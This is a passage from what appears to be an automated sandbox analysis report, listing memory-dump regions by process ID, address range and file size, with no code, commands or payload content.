                                                                                                                                                                                                                                                                                                                                                                                  • memory/4144-309-0x0000000000400000-0x00000000004BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    760KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4152-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4152-324-0x0000000000680000-0x000000000072E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4356-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4388-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4396-310-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4396-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4416-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4456-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4456-345-0x0000000008F70000-0x000000000F8EB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    105.5MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4492-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4492-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-294-0x0000000000BA0000-0x0000000000BA2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4732-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4748-284-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4748-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4772-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4776-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4788-335-0x0000000002990000-0x0000000002C70000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    2.9MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4788-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4788-347-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4788-348-0x0000000003000000-0x0000000003001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4788-321-0x0000000000610000-0x000000000075A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4800-253-0x0000000000F30000-0x0000000000F3D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    52KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4800-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4840-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4928-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4980-242-0x00000000024C0000-0x00000000024C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4980-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5000-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5104-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5104-248-0x00000000021F0000-0x00000000021F2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5164-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5280-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5388-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5476-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5600-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5636-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5652-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5892-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5912-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5928-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5956-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5984-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6016-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6028-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6080-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6096-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6124-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/6140-364-0x0000000000000000-mapping.dmp